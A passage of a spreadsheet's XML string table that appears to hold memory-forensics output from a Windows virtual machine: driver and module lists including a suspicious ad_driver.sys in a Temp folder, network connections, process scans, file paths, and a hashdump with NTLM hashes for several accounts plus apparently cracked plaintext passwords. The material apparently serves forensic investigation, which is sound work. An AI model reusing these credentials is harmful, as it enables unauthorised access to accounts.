  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\srvnet.sys</t>
  </si>
  <si>
    <t>0x8616def8</t>
  </si>
  <si>
    <t>0x9e967000</t>
  </si>
  <si>
    <t>tcpipreg.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\tcpipreg.sys</t>
  </si>
  <si>
    <t>0x863e3d18</t>
  </si>
  <si>
    <t>0x9e974000</t>
  </si>
  <si>
    <t>0x51000</t>
  </si>
  <si>
    <t>srv2.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\srv2.sys</t>
  </si>
  <si>
    <t>0x863e4920</t>
  </si>
  <si>
    <t>0x9e214000</t>
  </si>
  <si>
    <t>0x53000</t>
  </si>
  <si>
    <t>srv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\srv.sys</t>
  </si>
  <si>
    <t>0x8605d5f8</t>
  </si>
  <si>
    <t>0x9e267000</t>
  </si>
  <si>
    <t>rdpdr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\rdpdr.sys</t>
  </si>
  <si>
    <t>0x859f5c40</t>
  </si>
  <si>
    <t>0x9e28c000</t>
  </si>
  <si>
    <t>tdtcp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\tdtcp.sys</t>
  </si>
  <si>
    <t>0x859f7b68</t>
  </si>
  <si>
    <t>0x9e297000</t>
  </si>
  <si>
    <t>tssecsrv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\tssecsrv.sys</t>
  </si>
  <si>
    <t>0x85a3fa88</t>
  </si>
  <si>
    <t>0x9e2a5000</t>
  </si>
  <si>
    <t>RDPWD.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\RDPWD.SYS</t>
  </si>
  <si>
    <t>0x859b7e88</t>
  </si>
  <si>
    <t>0x9e2d7000</t>
  </si>
  <si>
    <t>0x6a000</t>
  </si>
  <si>
    <t>spsys.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\spsys.sys</t>
  </si>
  <si>
    <t>0x862c2140</t>
  </si>
  <si>
    <t>0x9e341000</t>
  </si>
  <si>
    <t>ad_driver.sys</t>
  </si>
  <si>
    <t>\??\C:\Users\Wilfred\AppData\Local\Temp\ad_driver.sys</t>
  </si>
  <si>
    <t>Proto</t>
  </si>
  <si>
    <t>LocalAddr</t>
  </si>
  <si>
    <t>LocalPort</t>
  </si>
  <si>
    <t>ForeignAddr</t>
  </si>
  <si>
    <t>ForeignPort</t>
  </si>
  <si>
    <t>State</t>
  </si>
  <si>
    <t>Owner</t>
  </si>
  <si>
    <t>Created</t>
  </si>
  <si>
    <t>0x51a2858</t>
  </si>
  <si>
    <t>UDPv6</t>
  </si>
  <si>
    <t>fe80::80ac:4126:fa58:1b81</t>
  </si>
  <si>
    <t>13:04:58.000000</t>
  </si>
  <si>
    <t>0x51bef58</t>
  </si>
  <si>
    <t>TCPv4</t>
  </si>
  <si>
    <t>0.0.0.0</t>
  </si>
  <si>
    <t>LISTENING</t>
  </si>
  <si>
    <t>0xde62c360</t>
  </si>
  <si>
    <t>UDPv4</t>
  </si>
  <si>
    <t>12:58:31.000000</t>
  </si>
  <si>
    <t>::</t>
  </si>
  <si>
    <t>0xde63a728</t>
  </si>
  <si>
    <t>0xde663ab0</t>
  </si>
  <si>
    <t>0xde6e0e18</t>
  </si>
  <si>
    <t>::1</t>
  </si>
  <si>
    <t>0xde7dd738</t>
  </si>
  <si>
    <t>12:57:51.000000</t>
  </si>
  <si>
    <t>0xde8153d0</t>
  </si>
  <si>
    <t>0xde815ca0</t>
  </si>
  <si>
    <t>TCPv6</t>
  </si>
  <si>
    <t>0xde81e4a8</t>
  </si>
  <si>
    <t>0xde81e998</t>
  </si>
  <si>
    <t>0xde828108</t>
  </si>
  <si>
    <t>0xde858278</t>
  </si>
  <si>
    <t>0xde858470</t>
  </si>
  <si>
    <t>0xdea8a0d0</t>
  </si>
  <si>
    <t>192.168.1.74</t>
  </si>
  <si>
    <t>0xdea96780</t>
  </si>
  <si>
    <t>0xdebc2700</t>
  </si>
  <si>
    <t>0xdebd2d98</t>
  </si>
  <si>
    <t>0xdebd2e50</t>
  </si>
  <si>
    <t>11:32:25.000000</t>
  </si>
  <si>
    <t>0xdebd33a8</t>
  </si>
  <si>
    <t>0xdebd5c90</t>
  </si>
  <si>
    <t>0xdec3aa78</t>
  </si>
  <si>
    <t>0xdeca4328</t>
  </si>
  <si>
    <t>0xdeca5b80</t>
  </si>
  <si>
    <t>0xdecab8f0</t>
  </si>
  <si>
    <t>0xdecadf58</t>
  </si>
  <si>
    <t>0xded12c88</t>
  </si>
  <si>
    <t>192.168.1.71</t>
  </si>
  <si>
    <t>CLOSED</t>
  </si>
  <si>
    <t>0xded96968</t>
  </si>
  <si>
    <t>0xded99de8</t>
  </si>
  <si>
    <t>0xdeda3258</t>
  </si>
  <si>
    <t>0xdedc50c8</t>
  </si>
  <si>
    <t>12:29:22.000000</t>
  </si>
  <si>
    <t>0xdeef4488</t>
  </si>
  <si>
    <t>0xdeef4880</t>
  </si>
  <si>
    <t>0xdeef5c98</t>
  </si>
  <si>
    <t>0xdeef5e50</t>
  </si>
  <si>
    <t>0xdeffd088</t>
  </si>
  <si>
    <t>0xdf23e7b8</t>
  </si>
  <si>
    <t>0xdf40a6b0</t>
  </si>
  <si>
    <t>0xdf54e5a8</t>
  </si>
  <si>
    <t>0xdf566550</t>
  </si>
  <si>
    <t>0xdf567d90</t>
  </si>
  <si>
    <t>0xdf5d3f50</t>
  </si>
  <si>
    <t>0xdf766198</t>
  </si>
  <si>
    <t>0xdfa32008</t>
  </si>
  <si>
    <t>12:30:36.000000</t>
  </si>
  <si>
    <t>0xdfa33768</t>
  </si>
  <si>
    <t>0xdfa355f8</t>
  </si>
  <si>
    <t>0xdfa357a8</t>
  </si>
  <si>
    <t>0xdfa7af50</t>
  </si>
  <si>
    <t>0xdfaa1490</t>
  </si>
  <si>
    <t>0xdfac3f58</t>
  </si>
  <si>
    <t>0xdfc944b8</t>
  </si>
  <si>
    <t>13:07:18.000000</t>
  </si>
  <si>
    <t>0xdfcbb410</t>
  </si>
  <si>
    <t>13:06:57.000000</t>
  </si>
  <si>
    <t>0xdfcf7f50</t>
  </si>
  <si>
    <t>127.0.0.1</t>
  </si>
  <si>
    <t>0xdfcff778</t>
  </si>
  <si>
    <t>40.115.119.185</t>
  </si>
  <si>
    <t>0xdfd09640</t>
  </si>
  <si>
    <t>0xdfd1d2e8</t>
  </si>
  <si>
    <t>0xdfd67200</t>
  </si>
  <si>
    <t>0xdfd801b8</t>
  </si>
  <si>
    <t>0xdfdaecc8</t>
  </si>
  <si>
    <t>0xdfde6280</t>
  </si>
  <si>
    <t>ESTABLISHED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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Start</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>Key</t>
  </si>
  <si>
    <t>Driver</t>
  </si>
  <si>
    <t>0x50e0750</t>
  </si>
  <si>
    <t>Wdf01000</t>
  </si>
  <si>
    <t>\Driver\Wdf01000</t>
  </si>
  <si>
    <t>0x513b350</t>
  </si>
  <si>
    <t>0x0</t>
  </si>
  <si>
    <t>\Driver\PnpManager</t>
  </si>
  <si>
    <t>PnpManager</t>
  </si>
  <si>
    <t>0x513fef8</t>
  </si>
  <si>
    <t>\Driver\ACPI_HAL</t>
  </si>
  <si>
    <t>ACPI_HAL</t>
  </si>
  <si>
    <t>0x5152a88</t>
  </si>
  <si>
    <t>monitor</t>
  </si>
  <si>
    <t>\Driver\monitor</t>
  </si>
  <si>
    <t>0x516abf0</t>
  </si>
  <si>
    <t>NDIS</t>
  </si>
  <si>
    <t>\Driver\NDIS</t>
  </si>
  <si>
    <t>0x516fd70</t>
  </si>
  <si>
    <t>\Driver\WMIxWDM</t>
  </si>
  <si>
    <t>WMIxWDM</t>
  </si>
  <si>
    <t>0x517d808</t>
  </si>
  <si>
    <t>FltMgr</t>
  </si>
  <si>
    <t>\FileSystem\FltMgr</t>
  </si>
  <si>
    <t>0x5188030</t>
  </si>
  <si>
    <t>ACPI</t>
  </si>
  <si>
    <t>\Driver\ACPI</t>
  </si>
  <si>
    <t>0xde4011d8</t>
  </si>
  <si>
    <t>0x3d80</t>
  </si>
  <si>
    <t>ad_driver</t>
  </si>
  <si>
    <t>\Driver\ad_driver</t>
  </si>
  <si>
    <t>0xdebe3b58</t>
  </si>
  <si>
    <t>srv2</t>
  </si>
  <si>
    <t>\FileSystem\srv2</t>
  </si>
  <si>
    <t>0xdebe4708</t>
  </si>
  <si>
    <t>srv</t>
  </si>
  <si>
    <t>\FileSystem\srv</t>
  </si>
  <si>
    <t>0xdec337e0</t>
  </si>
  <si>
    <t>luafv</t>
  </si>
  <si>
    <t>\FileSystem\luafv</t>
  </si>
  <si>
    <t>0xded6f410</t>
  </si>
  <si>
    <t>PEAUTH</t>
  </si>
  <si>
    <t>\Driver\PEAUTH</t>
  </si>
  <si>
    <t>0xded72dc0</t>
  </si>
  <si>
    <t>srvnet</t>
  </si>
  <si>
    <t>\FileSystem\srvnet</t>
  </si>
  <si>
    <t>0xded74030</t>
  </si>
  <si>
    <t>tcpipreg</t>
  </si>
  <si>
    <t>\Driver\tcpipreg</t>
  </si>
  <si>
    <t>0xdee3f470</t>
  </si>
  <si>
    <t>\Driver\Win32k</t>
  </si>
  <si>
    <t>Win32k</t>
  </si>
  <si>
    <t>0xdf23f030</t>
  </si>
  <si>
    <t>RDPWD</t>
  </si>
  <si>
    <t>\Driver\RDPWD</t>
  </si>
  <si>
    <t>0xdf409500</t>
  </si>
  <si>
    <t>rspndr</t>
  </si>
  <si>
    <t>\Driver\rspndr</t>
  </si>
  <si>
    <t>0xdf412248</t>
  </si>
  <si>
    <t>0x3700</t>
  </si>
  <si>
    <t>CmBatt</t>
  </si>
  <si>
    <t>\Driver\CmBatt</t>
  </si>
  <si>
    <t>0xdf438e20</t>
  </si>
  <si>
    <t>umbus</t>
  </si>
  <si>
    <t>\Driver\umbus</t>
  </si>
  <si>
    <t>0xdf44a8f8</t>
  </si>
  <si>
    <t>NdisTapi</t>
  </si>
  <si>
    <t>\Driver\NdisTapi</t>
  </si>
  <si>
    <t>0xdf564c18</t>
  </si>
  <si>
    <t>RDPDR</t>
  </si>
  <si>
    <t>\Driver\RDPDR</t>
  </si>
  <si>
    <t>0xdf5684d0</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>\Driver\HTTP</t>
  </si>
  <si>
    <t>0xdf575eb8</t>
  </si>
  <si>
    <t>bowser</t>
  </si>
  <si>
    <t>\FileSystem\bowser</t>
  </si>
  <si>
    <t>0xdf58fe48</t>
  </si>
  <si>
    <t>mpsdrv</t>
  </si>
  <si>
    <t>\Driver\mpsdrv</t>
  </si>
  <si>
    <t>0xdf591370</t>
  </si>
  <si>
    <t>mrxsmb</t>
  </si>
  <si>
    <t>\FileSystem\mrxsmb</t>
  </si>
  <si>
    <t>0xdf593740</t>
  </si>
  <si>
    <t>mrxsmb20</t>
  </si>
  <si>
    <t>\FileSystem\mrxsmb20</t>
  </si>
  <si>
    <t>0xdf597b68</t>
  </si>
  <si>
    <t>mrxsmb10</t>
  </si>
  <si>
    <t>\FileSystem\mrxsmb10</t>
  </si>
  <si>
    <t>0xdf5f2e40</t>
  </si>
  <si>
    <t>tssecsrv</t>
  </si>
  <si>
    <t>\Driver\tssecsrv</t>
  </si>
  <si>
    <t>0xdf5f5a80</t>
  </si>
  <si>
    <t>TDTCP</t>
  </si>
  <si>
    <t>\Driver\TDTCP</t>
  </si>
  <si>
    <t>0xdf770030</t>
  </si>
  <si>
    <t>VgaSave</t>
  </si>
  <si>
    <t>\Driver\VgaSave</t>
  </si>
  <si>
    <t>0xdf770d18</t>
  </si>
  <si>
    <t>RDPCDD</t>
  </si>
  <si>
    <t>\Driver\RDPCDD</t>
  </si>
  <si>
    <t>0xdf771030</t>
  </si>
  <si>
    <t>RDPENCDD</t>
  </si>
  <si>
    <t>\Driver\RDPENCDD</t>
  </si>
  <si>
    <t>0xdf771768</t>
  </si>
  <si>
    <t>Npfs</t>
  </si>
  <si>
    <t>\FileSystem\Npfs</t>
  </si>
  <si>
    <t>0xdf772030</t>
  </si>
  <si>
    <t>RDPREFMP</t>
  </si>
  <si>
    <t>\Driver\RDPREFMP</t>
  </si>
  <si>
    <t>0xdf772630</t>
  </si>
  <si>
    <t>Msfs</t>
  </si>
  <si>
    <t>\FileSystem\Msfs</t>
  </si>
  <si>
    <t>0xdf773d48</t>
  </si>
  <si>
    <t>tdx</t>
  </si>
  <si>
    <t>\Driver\tdx</t>
  </si>
  <si>
    <t>0xdf774e18</t>
  </si>
  <si>
    <t>VBoxSF</t>
  </si>
  <si>
    <t>\FileSystem\VBoxSF</t>
  </si>
  <si>
    <t>0xdf77d320</t>
  </si>
  <si>
    <t>AFD</t>
  </si>
  <si>
    <t>\Driver\AFD</t>
  </si>
  <si>
    <t>0xdf77f738</t>
  </si>
  <si>
    <t>NetBT</t>
  </si>
  <si>
    <t>\Driver\NetBT</t>
  </si>
  <si>
    <t>0xdf77f8b0</t>
  </si>
  <si>
    <t>WfpLwf</t>
  </si>
  <si>
    <t>\Driver\WfpLwf</t>
  </si>
  <si>
    <t>0xdf7809d8</t>
  </si>
  <si>
    <t>NetBIOS</t>
  </si>
  <si>
    <t>\FileSystem\NetBIOS</t>
  </si>
  <si>
    <t>0xdf781030</t>
  </si>
  <si>
    <t>Psched</t>
  </si>
  <si>
    <t>\Driver\Psched</t>
  </si>
  <si>
    <t>0xdf7944f0</t>
  </si>
  <si>
    <t>Wanarpv6</t>
  </si>
  <si>
    <t>\Driver\Wanarpv6</t>
  </si>
  <si>
    <t>0xdf7955d8</t>
  </si>
  <si>
    <t>TermDD</t>
  </si>
  <si>
    <t>\Driver\TermDD</t>
  </si>
  <si>
    <t>0xdf7959f8</t>
  </si>
  <si>
    <t>rdbss</t>
  </si>
  <si>
    <t>\FileSystem\rdbss</t>
  </si>
  <si>
    <t>0xdf798510</t>
  </si>
  <si>
    <t>nsiproxy</t>
  </si>
  <si>
    <t>\Driver\nsiproxy</t>
  </si>
  <si>
    <t>0xdf79aa18</t>
  </si>
  <si>
    <t>discache</t>
  </si>
  <si>
    <t>\Driver\discache</t>
  </si>
  <si>
    <t>0xdf79ab10</t>
  </si>
  <si>
    <t>mssmbios</t>
  </si>
  <si>
    <t>\Driver\mssmbios</t>
  </si>
  <si>
    <t>0xdf7a0140</t>
  </si>
  <si>
    <t>DfsC</t>
  </si>
  <si>
    <t>\FileSystem\DfsC</t>
  </si>
  <si>
    <t>0xdf7a0d58</t>
  </si>
  <si>
    <t>CSC</t>
  </si>
  <si>
    <t>\Driver\CSC</t>
  </si>
  <si>
    <t>0xdf7a2698</t>
  </si>
  <si>
    <t>blbdrive</t>
  </si>
  <si>
    <t>\Driver\blbdrive</t>
  </si>
  <si>
    <t>0xdf7aef38</t>
  </si>
  <si>
    <t>tunnel</t>
  </si>
  <si>
    <t>\Driver\tunnel</t>
  </si>
  <si>
    <t>0xdf7af5f0</t>
  </si>
  <si>
    <t>mouclass</t>
  </si>
  <si>
    <t>\Driver\mouclass</t>
  </si>
  <si>
    <t>0xdf7b27a8</t>
  </si>
  <si>
    <t>kbdclass</t>
  </si>
  <si>
    <t>\Driver\kbdclass</t>
  </si>
  <si>
    <t>0xdf7b4858</t>
  </si>
  <si>
    <t>VBoxVideo</t>
  </si>
  <si>
    <t>\Driver\VBoxVideo</t>
  </si>
  <si>
    <t>0xdf7b4ba8</t>
  </si>
  <si>
    <t>VBoxMouse</t>
  </si>
  <si>
    <t>\Driver\VBoxMouse</t>
  </si>
  <si>
    <t>0xdf7ccf38</t>
  </si>
  <si>
    <t>E1G60</t>
  </si>
  <si>
    <t>\Driver\E1G60</t>
  </si>
  <si>
    <t>0xdf7d18d0</t>
  </si>
  <si>
    <t>NdisWan</t>
  </si>
  <si>
    <t>\Driver\NdisWan</t>
  </si>
  <si>
    <t>0xdf7d6b78</t>
  </si>
  <si>
    <t>RasPppoe</t>
  </si>
  <si>
    <t>\Driver\RasPppoe</t>
  </si>
  <si>
    <t>0xdf7d8030</t>
  </si>
  <si>
    <t>PptpMiniport</t>
  </si>
  <si>
    <t>\Driver\PptpMiniport</t>
  </si>
  <si>
    <t>0xdf7daeb8</t>
  </si>
  <si>
    <t>RasSstp</t>
  </si>
  <si>
    <t>\Driver\RasSstp</t>
  </si>
  <si>
    <t>0xdf7dbf38</t>
  </si>
  <si>
    <t>rdpbus</t>
  </si>
  <si>
    <t>\Driver\rdpbus</t>
  </si>
  <si>
    <t>0xdf7dd030</t>
  </si>
  <si>
    <t>0x1380</t>
  </si>
  <si>
    <t>swenum</t>
  </si>
  <si>
    <t>\Driver\swenum</t>
  </si>
  <si>
    <t>0xdf7e1218</t>
  </si>
  <si>
    <t>Rasl2tp</t>
  </si>
  <si>
    <t>\Driver\Rasl2tp</t>
  </si>
  <si>
    <t>0xdf7f9030</t>
  </si>
  <si>
    <t>NDProxy</t>
  </si>
  <si>
    <t>\Driver\NDProxy</t>
  </si>
  <si>
    <t>0xdf7fc500</t>
  </si>
  <si>
    <t>lltdio</t>
  </si>
  <si>
    <t>\Driver\lltdio</t>
  </si>
  <si>
    <t>0xdf866358</t>
  </si>
  <si>
    <t>pcw</t>
  </si>
  <si>
    <t>\Driver\pcw</t>
  </si>
  <si>
    <t>0xdf866450</t>
  </si>
  <si>
    <t>VBoxGuest</t>
  </si>
  <si>
    <t>\Driver\VBoxGuest</t>
  </si>
  <si>
    <t>0xdf868628</t>
  </si>
  <si>
    <t>Tcpip</t>
  </si>
  <si>
    <t>\Driver\Tcpip</t>
  </si>
  <si>
    <t>0xdf869a50</t>
  </si>
  <si>
    <t>Fs_Rec</t>
  </si>
  <si>
    <t>\FileSystem\Fs_Rec</t>
  </si>
  <si>
    <t>0xdf876ad8</t>
  </si>
  <si>
    <t>KSecPkg</t>
  </si>
  <si>
    <t>\Driver\KSecPkg</t>
  </si>
  <si>
    <t>0xdf8b0e78</t>
  </si>
  <si>
    <t>fvevol</t>
  </si>
  <si>
    <t>\Driver\fvevol</t>
  </si>
  <si>
    <t>0xdf8be1c8</t>
  </si>
  <si>
    <t>Disk</t>
  </si>
  <si>
    <t>\Driver\Disk</t>
  </si>
  <si>
    <t>0xdf8c3030</t>
  </si>
  <si>
    <t>volsnap</t>
  </si>
  <si>
    <t>\Driver\volsnap</t>
  </si>
  <si>
    <t>0xdf8c3240</t>
  </si>
  <si>
    <t>Mup</t>
  </si>
  <si>
    <t>\FileSystem\Mup</t>
  </si>
  <si>
    <t>0xdf8c3460</t>
  </si>
  <si>
    <t>spldr</t>
  </si>
  <si>
    <t>\Driver\spldr</t>
  </si>
  <si>
    <t>0xdf8c3960</t>
  </si>
  <si>
    <t>0x8380</t>
  </si>
  <si>
    <t>storflt</t>
  </si>
  <si>
    <t>\Driver\storflt</t>
  </si>
  <si>
    <t>0xdf8c3f38</t>
  </si>
  <si>
    <t>rdyboost</t>
  </si>
  <si>
    <t>\Driver\rdyboost</t>
  </si>
  <si>
    <t>0xdf8c9030</t>
  </si>
  <si>
    <t>hwpolicy</t>
  </si>
  <si>
    <t>\Driver\hwpolicy</t>
  </si>
  <si>
    <t>0xdf8cb898</t>
  </si>
  <si>
    <t>CompositeBus</t>
  </si>
  <si>
    <t>\Driver\CompositeBus</t>
  </si>
  <si>
    <t>0xdf93e890</t>
  </si>
  <si>
    <t>ac97intc</t>
  </si>
  <si>
    <t>\Driver\ac97intc</t>
  </si>
  <si>
    <t>0xdf940e00</t>
  </si>
  <si>
    <t>Null</t>
  </si>
  <si>
    <t>\Driver\Null</t>
  </si>
  <si>
    <t>0xdf9d9a68</t>
  </si>
  <si>
    <t>RasAgileVpn</t>
  </si>
  <si>
    <t>\Driver\RasAgileVpn</t>
  </si>
  <si>
    <t>0xdfc071b8</t>
  </si>
  <si>
    <t>RAW</t>
  </si>
  <si>
    <t>\FileSystem\RAW</t>
  </si>
  <si>
    <t>0xdfc181b8</t>
  </si>
  <si>
    <t>\Driver\00000052</t>
  </si>
  <si>
    <t>0xdfc1e998</t>
  </si>
  <si>
    <t>amdxata</t>
  </si>
  <si>
    <t>\Driver\amdxata</t>
  </si>
  <si>
    <t>0xdfc24a38</t>
  </si>
  <si>
    <t>vdrvroot</t>
  </si>
  <si>
    <t>\Driver\vdrvroot</t>
  </si>
  <si>
    <t>0xdfc281c8</t>
  </si>
  <si>
    <t>partmgr</t>
  </si>
  <si>
    <t>\Driver\partmgr</t>
  </si>
  <si>
    <t>0xdfc2a3b0</t>
  </si>
  <si>
    <t>i8042prt</t>
  </si>
  <si>
    <t>\Driver\i8042prt</t>
  </si>
  <si>
    <t>0xdfc2b478</t>
  </si>
  <si>
    <t>Ntfs</t>
  </si>
  <si>
    <t>\FileSystem\Ntfs</t>
  </si>
  <si>
    <t>0xdfc2b6c8</t>
  </si>
  <si>
    <t>CLFS</t>
  </si>
  <si>
    <t>\Driver\CLFS</t>
  </si>
  <si>
    <t>0xdfc310a8</t>
  </si>
  <si>
    <t>volmgr</t>
  </si>
  <si>
    <t>\Driver\volmgr</t>
  </si>
  <si>
    <t>0xdfc317f8</t>
  </si>
  <si>
    <t>Compbatt</t>
  </si>
  <si>
    <t>\Driver\Compbatt</t>
  </si>
  <si>
    <t>0xdfc31910</t>
  </si>
  <si>
    <t>volmgrx</t>
  </si>
  <si>
    <t>\Driver\volmgrx</t>
  </si>
  <si>
    <t>0xdfc32430</t>
  </si>
  <si>
    <t>intelide</t>
  </si>
  <si>
    <t>\Driver\intelide</t>
  </si>
  <si>
    <t>0xdfc325b0</t>
  </si>
  <si>
    <t>mountmgr</t>
  </si>
  <si>
    <t>\Driver\mountmgr</t>
  </si>
  <si>
    <t>0xdfc33a38</t>
  </si>
  <si>
    <t>pci</t>
  </si>
  <si>
    <t>\Driver\pci</t>
  </si>
  <si>
    <t>0xdfc33b70</t>
  </si>
  <si>
    <t>FileInfo</t>
  </si>
  <si>
    <t>\FileSystem\FileInfo</t>
  </si>
  <si>
    <t>0xdfc33d90</t>
  </si>
  <si>
    <t>msisadrv</t>
  </si>
  <si>
    <t>\Driver\msisadrv</t>
  </si>
  <si>
    <t>0xdfc4b758</t>
  </si>
  <si>
    <t>0x29180</t>
  </si>
  <si>
    <t>vmbus</t>
  </si>
  <si>
    <t>\Driver\vmbus</t>
  </si>
  <si>
    <t>0xdfc4c5d8</t>
  </si>
  <si>
    <t>atapi</t>
  </si>
  <si>
    <t>\Driver\atapi</t>
  </si>
  <si>
    <t>0xdfc5c9b0</t>
  </si>
  <si>
    <t>Beep</t>
  </si>
  <si>
    <t>\Driver\Beep</t>
  </si>
  <si>
    <t>0xdfc5e6e8</t>
  </si>
  <si>
    <t>CNG</t>
  </si>
  <si>
    <t>\Driver\CNG</t>
  </si>
  <si>
    <t>0xdfc5e9b8</t>
  </si>
  <si>
    <t>KSecDD</t>
  </si>
  <si>
    <t>\Driver\KSecDD</t>
  </si>
  <si>
    <t>Name2</t>
  </si>
  <si>
    <t>Offset(Virtual)</t>
  </si>
  <si>
    <t>pslist</t>
  </si>
  <si>
    <t>psscan</t>
  </si>
  <si>
    <t>thrdscan</t>
  </si>
  <si>
    <t>csrss</t>
  </si>
  <si>
    <t>Exit</t>
  </si>
  <si>
    <t>Time</t>
  </si>
  <si>
    <t>0xde7dd200</t>
  </si>
  <si>
    <t>13:06:39+00:00</t>
  </si>
  <si>
    <t>0xdec01200</t>
  </si>
  <si>
    <t>0xded08608</t>
  </si>
  <si>
    <t>0xdfa50d20</t>
  </si>
  <si>
    <t>0x861c7210</t>
  </si>
  <si>
    <t>12:57:14+00:00</t>
  </si>
  <si>
    <t>0xdec6aa20</t>
  </si>
  <si>
    <t>0xded45630</t>
  </si>
  <si>
    <t>0xdeebb030</t>
  </si>
  <si>
    <t>11:32:20+00:00</t>
  </si>
  <si>
    <t>0xdfdf4a38</t>
  </si>
  <si>
    <t>0xdfdf4440</t>
  </si>
  <si>
    <t>0x8519ea50</t>
  </si>
  <si>
    <t>wermgr.exe</t>
  </si>
  <si>
    <t>12:43:36+00:00</t>
  </si>
  <si>
    <t>0xdfdfea60</t>
  </si>
  <si>
    <t>0xde7e0668</t>
  </si>
  <si>
    <t>0xdfa56468</t>
  </si>
  <si>
    <t>0x867e0668</t>
  </si>
  <si>
    <t>0xdebf7a70</t>
  </si>
  <si>
    <t>0xdf1bf030</t>
  </si>
  <si>
    <t>0xdebef030</t>
  </si>
  <si>
    <t>0xdf5d7030</t>
  </si>
  <si>
    <t>0xdfca6870</t>
  </si>
  <si>
    <t>0x51bba78</t>
  </si>
  <si>
    <t>0xdf783280</t>
  </si>
  <si>
    <t>0xdecff888</t>
  </si>
  <si>
    <t>0xdef67688</t>
  </si>
  <si>
    <t>0xdfa55d20</t>
  </si>
  <si>
    <t>0xdfdb9d20</t>
  </si>
  <si>
    <t>0xdef8e8c0</t>
  </si>
  <si>
    <t>0x51ad4e0</t>
  </si>
  <si>
    <t>0xded4c8e0</t>
  </si>
  <si>
    <t>0xdec88030</t>
  </si>
  <si>
    <t>0xde830030</t>
  </si>
  <si>
    <t>0xdec08030</t>
  </si>
  <si>
    <t>0xdec07b00</t>
  </si>
  <si>
    <t>0xdebcc308</t>
  </si>
  <si>
    <t>0xdf56ad20</t>
  </si>
  <si>
    <t>0xdfdd6d20</t>
  </si>
  <si>
    <t>0xdec97918</t>
  </si>
  <si>
    <t>0xdefc9b20</t>
  </si>
  <si>
    <t>0xdf546d20</t>
  </si>
  <si>
    <t>0xdecb7140</t>
  </si>
  <si>
    <t>0x867e8b40</t>
  </si>
  <si>
    <t>0xde846b70</t>
  </si>
  <si>
    <t>0xdebe5030</t>
  </si>
  <si>
    <t>0xdebe9030</t>
  </si>
  <si>
    <t>0x85171030</t>
  </si>
  <si>
    <t>SearchFilterHo</t>
  </si>
  <si>
    <t>12:31:41+00:00</t>
  </si>
  <si>
    <t>0x851a9030</t>
  </si>
  <si>
    <t>12:57:10+00:00</t>
  </si>
  <si>
    <t>0xdfdfc180</t>
  </si>
  <si>
    <t>0xdecf6388</t>
  </si>
  <si>
    <t>0x50d1b90</t>
  </si>
  <si>
    <t>0xdfddc9a0</t>
  </si>
  <si>
    <t>0xdf5be5b8</t>
  </si>
  <si>
    <t>0xdfa04320</t>
  </si>
  <si>
    <t>0xde7f87d8</t>
  </si>
  <si>
    <t>12:44:25+00:00</t>
  </si>
  <si>
    <t>0x867f87d8</t>
  </si>
  <si>
    <t>0xdf5783e0</t>
  </si>
  <si>
    <t>0xdfb239e0</t>
  </si>
  <si>
    <t>0xdfa06030</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>rid</t>
  </si>
  <si>
    <t>lmhash</t>
  </si>
  <si>
    <t>nthash</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>aad3b435b51404eeaad3b435b51404ee</t>
  </si>
  <si>
    <t>fc525c9683e8fe067095ba2ddc971889</t>
  </si>
  <si>
    <t>Guest</t>
  </si>
  <si>
    <t>31d6cfe0d16ae931b73c59d7e0c089c0</t>
  </si>
  <si>
    <t>sshd</t>
  </si>
  <si>
    <t>sshd_server</t>
  </si>
  <si>
    <t>8d0a16cfc061c3359db455d00ec27035</t>
  </si>
  <si>
    <t>Wilfred</t>
  </si>
  <si>
    <t>fbdcd5041c96ddbd82224270b57f11fc</t>
  </si>
  <si>
    <t>Support</t>
  </si>
  <si>
    <t>69943c5e63b4d2c104dbbcc15138b72b</t>
  </si>
  <si>
    <t>Passw0rd!</t>
  </si>
  <si>
    <t>D@rj33l1ng</t>
  </si>
  <si>
    <t>Password!</t>
  </si>
  <si>
    <t>_x001B_[0K</t>
  </si>
  <si>
    <t>0x50c1d98</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\netbt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0x50d0410</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_233_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0x50d07d8</t>
  </si>
  <si>
    <t>\Windows\System32\RacRules.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0x5132038</t>
  </si>
  <si>
    <t>\Windows\Fonts\kokila.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5132c30</t>
  </si>
  <si>
    <t>\Windows\Fonts\vgasys.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0x5132f40</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_appcompat_programs_99c7f419bd54f4ca.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0x51369a8</t>
  </si>
  <si>
    <t>\Windows_x001B_[0K</t>
  </si>
  <si>
    <t>0x5136b80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\winlogon.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x5140cf0</t>
  </si>
  <si>
    <t>\Windows\System32\wmdrmsdk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5141900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2545698~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0x5141ce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_37_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
